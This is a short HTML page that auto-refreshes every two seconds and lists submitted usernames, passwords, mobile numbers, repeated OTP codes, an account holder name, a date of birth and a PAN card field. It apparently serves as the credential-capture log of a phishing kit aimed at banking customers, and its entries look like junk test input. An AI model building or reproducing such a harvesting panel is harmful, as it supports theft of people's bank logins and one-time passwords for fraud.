<!DOCTYPE html>
<html lang="xxxx">

<head>

    <meta charset="utf-8">
    <meta http-equiv="refresh" content="2">




    <style>
        body {
            bottom: 0px;
        }

        * {
            bottom: 0px;
        }

        <!-- PHP program to display
        header list -->
    </style>
</head>

<body style="background-position:bottom; bottom:20px; position:absolute; border-bottom:5px solid green; width:98%;">
</body>
username= nwnknwj
<br>password= wkkkwk
<br>mobile_no_= 987887878
<br>
<br>username= jwjbdbhbdh
<br>password= qjkjqkjqj
<br>mobile_no_= 9999999999996868
<br>
<br>otp1*= 66666777777777777
<br>
<br>acholder_name*= 878
<br>DOB= hhhuug
<br>
<br>username= bbbbb
<br>password= nnnnn
<br>mobile_no_= 99999
<br>
<br>otp1*= 8888888
<br>
<br>acholder_name*= hhhhhh
<br>DOB= uuuuu
<br>
<br>otp2*= 9999999
<br>
<br>otp3*= 909090
<br>
<br>PAN_CARD= juujuj
<br>
<br>otp4*= 8888888
<br>
<br>otp5*= 9999999
<br>
<br>otp5*= 0000000
<br>
<br>otp5*= 65656565
<br>
<br>otp5*= 656565
<br>
<br>otp5*= 1212121
<br>
<br>otp5*= 121212
<br>
<br>otp5*= 55656565
<br>
<br>otp5*= 767676
<br>
<br>otp5*= 21324235123
<br>
<br>otp5*= 56565757
<br>
<br>otp5*= 5343545
<br>
<br>otp5*= 121212
<br>
<br>